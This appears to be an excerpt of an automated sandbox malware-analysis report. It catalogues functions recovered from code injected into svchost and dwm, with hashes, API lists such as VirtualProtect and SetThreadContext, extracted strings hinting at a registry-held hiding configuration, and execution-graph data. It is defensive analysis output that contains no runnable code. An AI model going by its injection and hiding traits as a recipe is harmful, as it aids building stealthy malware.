                                                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                        • Instruction Fuzzy Hash: 65F08CA0B04BC083EA008B93B90D119B2A9AB4AFC0F0C8430EE4B27B28DF7CC44D8701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: e21ae87d0ac0485e57b5ed7f78d9bcfc49820b6887902ab70198c3f652ea4012
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 24F06275B1164583EF108B64E84D3597368EB86F61F5C4619CA6B5B1E8CF6CC14DC341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: 9fa3ce34b8c865c90ad51e3620c2008df4696012e5c82a0db968548b5f0cb8e8
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 1002E832A19B8487EB60CB55F49835AB7E4F3C5B91F140015EA8E97BA8DF7DC488CB41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 94fa4eeebce64f2b49e1f32bc3357c48cfb3c794009292f3f2d6159d2374f774
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: AE61F636A19B44C7E7608B15E44C31AB7E8F389B85F580115EA8E57BA8DF7CC548CF82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 22cd65d3b8f6dd6f7d9b94902791a143805ac03df98696b6fd4da49aabfe5191
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F2118F22F10AD113FA649539F44D36911CD7B5FB76E4C8638A966073F68F2CCACD4202
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 66361736f5e8a90f3f2d0b71ac309b0d3cb3498acf01c0f7b7fefb88f4f0f5d8
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: F211A022F10A5123F6641568E95F369354C6B7BBBCF5C0634E977277E6CF2CC84A8202
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 0bf1e752806efdf3d6918c8cb5621e3440e718aefe77ceb97043c9c5cc2f889e
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 80618E66F0024047FB658B75E54C32B66ADEB87F40F5D4519CA4A177A8DF3CC9CE820A
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: af1233a52f56241061660763b27a88547fce862d6649db4ccb4df901e0d389cc
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 86614932B00B848AEB20DF65E44839D77E4F345B89F084215EE4A27BA8DF78C599C781
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 9e9e64640e33ee222bca170c8ee76b8c2aa3a2d202631a961c3e70975ee64d6a
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: CE515B32E042808BEBA48B26D44CB5877ADFB56F84F1C5116DA9987AE5CF7CD4D88702
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 71553aecd4e6c0be1a45bd4f8553e36c14cf70e2545c3f161416fa0a9a176b52
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 7F519272B002808BEB648F25A49C35977E8F356F86F1C4119DA8A67BE5CF7CD458C782
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8201e1b19b336b27b06942c19ab8646d026c506d3e7787226ca7cd4a84cb06ae
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 4751AF32F112008BEB14CB15E40CB59379DFB52F98F9AA124DA064378CEF38D9C89706
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: cefbc8a046af985220aa2329bd1f73024f30a7703efedaf0860a35be415e2574
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 94317A35B1168097E7149B21E84C75937ACFB42F88F5A9018EE5A03788DF3CC988D706
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: daab32c25a9fadadc3e1a32652520a2a78c62dababe1d4e9fdec7867a8e6883d
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 7AD1E332B14A808AE711CFB5D54939C3BB9F356B98F284215DE5AB7B99DF38C40AC341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction ID: 921e1a85b60784aa0bba0433d9b0249e05675eea00effd83e5fc34bb76f58227
                                                        • Opcode Fuzzy Hash: ccd79a5c24cc2b6b77d5d0d776de3086a7ca9ca8278a44c8c605b81f59301eca
                                                        • Instruction Fuzzy Hash: D5118BB6A00AD0C7E714DFA2A80D25977B8F78AF85F084035EA4A23726DF7CC058C741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: f98e1d8c780189fb48322b240abb3135e65948d30303f15e17900ffbada13fd6
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: 85918E72B1065486FB609F75994E3AD3BA8B747F98F284109DE0B77694DF38C48AC702
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 1cc862d301829f27dd78957ba1fd8c5096fa0c01cbaac4e6f591e442f6dc95cb
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 14111F32B10F418AEB409B60E8593A833B8F719B58F480D21DA6E57794DF7CC1988381
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: a77167060b87a4fc452a4d9a47af32d2e27e7869f2a7b79b94de1e5e43e7598e
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 3571A436B0078147EA25DE35994C3AA67E8F386F95F580016DD0B63B89DF39C54DC782
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 4c1e01fd7d14f6ffb4a4eaa44a0f6dfd295677d667dd27de79d18e1f6fb3ebd9
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 21614832F00B848AEB20DF65D48879D77A8FB45B88F084216EF4917B99DF38D199C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 8b65ca84562374e5dcff84955426101dcfa6df48021d4bc966f847153521bb2b
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 03519232B0478183E664DA39A65C3AAA6E9F386F41F4A0125DD5B33B59DF3DC50C87C2
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: 435cc8df130a4e77d3710c788b2ddf4808abbc3271533ea666418ec5651f9c6f
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: E941E672B14A8087DB20DF25E94D3AA77A4F38AB94F584021EE4E97784DF7CC405C741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: b3e6afc7812eff5d23d9e2531ddbd3c8dde3b3595130f4102b15f64d21df9287
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 5A115832604B8082EB218F15E448359B7E8FB89F94F1D4220EE8E17B68DF3CC555CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 0f3f6b22aa811685f5e546128debed61f89d1e56892167602ce41c22e1950124
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: FDE04F65B50B8591DB028F62E8482D833A89B5AB64B489122D95C07311EB3CD2EDC301
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3143881196.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 93a3ced56bc647de6299b8a1905d2a6032edb69f7bc4320d41604ef82ca62c1f
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: AEE08666F10B4481DF028F71E4441D87368EB5AF54B8C9122C95C07311EF3CD2E9C301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 72cf71b4c8bcd0622c645fc165e77207b5f5e2b8a8cfb2fde8c47a753de635a3
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: FC115B75B01B8482EA04DB66A80D22A73E9EB8AFC5F1C4028DE4E67765DFBCC446C341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: b5369b631e5731d7a483f2840394a7dd6d44661382897b8f9f01a4c4ceb7f075
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 18E065B5B01A4487EB088FA2D80D34A36E5FB8AF06F09C024CD0A07361DFFD8499CB91

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:95.3%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:127
                                                        Total number of Limit Nodes:16
                                                        execution_graph 14920 2baaedf3ab9 14923 2baaedf3a06 14920->14923 14921 2baaedf3a70 14922 2baaedf3a56 VirtualQuery 14922->14921 14922->14923 14923->14921 14923->14922 14924 2baaedf3a8a VirtualAlloc 14923->14924 14924->14921 14925 2baaedf3abb GetLastError 14924->14925 14925->14921 14925->14923 14926 2baaedf28c8 14928 2baaedf290e 14926->14928 14927 2baaedf2970 14928->14927 14930 2baaedf3844 14928->14930 14931 2baaedf3851 StrCmpNIW 14930->14931 14932 2baaedf3866 14930->14932 14931->14932 14932->14928 14933 2baaedf5cf0 14934 2baaedf5cfd 14933->14934 14935 2baaedf5d09 14934->14935 14942 2baaedf5e1a 14934->14942 14936 2baaedf5d3e 14935->14936 14937 2baaedf5d8d 14935->14937 14938 2baaedf5d66 SetThreadContext 14936->14938 14938->14937 14939 2baaedf5e41 VirtualProtect FlushInstructionCache 14939->14942 14940 2baaedf5efe 14941 2baaedf5f1e 14940->14941 14955 2baaedf43e0 14940->14955 14951 2baaedf4df0 GetCurrentProcess 14941->14951 14942->14939 14942->14940 14945 2baaedf5f23 14946 2baaedf5f77 14945->14946 14947 2baaedf5f37 ResumeThread 14945->14947 14959 2baaedf7940 14946->14959 14948 2baaedf5f6b 14947->14948 14948->14945 14950 2baaedf5fbf 14952 2baaedf4e0c 14951->14952 14953 2baaedf4e53 14952->14953 14954 2baaedf4e22 VirtualProtect FlushInstructionCache 14952->14954 14953->14945 14954->14952 14957 2baaedf43fc 14955->14957 14956 2baaedf445f 14956->14941 14957->14956 14958 2baaedf4412 VirtualFree 14957->14958 14958->14957 14960 2baaedf7949 14959->14960 14961 2baaedf7954 14960->14961 14962 2baaedf812c IsProcessorFeaturePresent 14960->14962 14961->14950 14963 2baaedf8144 14962->14963 14966 2baaedf8320 RtlCaptureContext 14963->14966 14965 2baaedf8157 14965->14950 14967 2baaedf833a RtlLookupFunctionEntry 14966->14967 14968 2baaedf8389 14967->14968 14969 2baaedf8350 capture_previous_context 14967->14969 14968->14965 14969->14967 14969->14968 14970 2baaedf554d 14972 2baaedf5554 14970->14972 14971 2baaedf55bb 14972->14971 14973 
                                                        [Control-flow graph rendered as an image in the original report; the extracted node/edge list is not reproduced here.]

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: cc604fdf19191dbabe7159fc9bdb1041bbded78c0f78efac77444c2b15d6f476
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 1D712826350B11D6EB60DF66E88879933B5FB88B88F101125DE8E87F2ADF38C544C761

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: ffce113c4f51f2fcc8a35aca12e5c75aecb4ee8a21be27ed17485a1f1fe12a63
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 78112726704B4192EF689B21E40836973B4FB88B85F654029DE8D07B98EF3DC645C725

                                                        Control-flow Graph

                                                        [Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); the extracted node/edge list is not reproduced here.]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction ID: 392e463944371945da43ea719fc9880e6036c71f4b1d6409742f5ca2829370fa
                                                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction Fuzzy Hash: 83D1BD36219B8886DB70DB0AE49835A7BB0F7C8B84F204616EACD47BA5DF3DC541CB51

                                                        Control-flow Graph

                                                        [Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); the extracted node/edge list is not reproduced here.]
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction ID: 29d0c8c4cc931ee5d2ea1b84e55410bc3ffa75d85f6dc27cb7d6306d52025f18
                                                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction Fuzzy Hash: 5D02D932219B8486EB60DB59F59435ABBB1F3C4794F204515EACE87BA8DF7CC884CB11

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001E.00000002.3183087492.000002BAAEDF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAEDF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_30_2_2baaedf0000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: f8a67aedf62b22c6bdb465cfe66f1f0cb3fdfa8cf39a8d96e9152993a44561f3
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
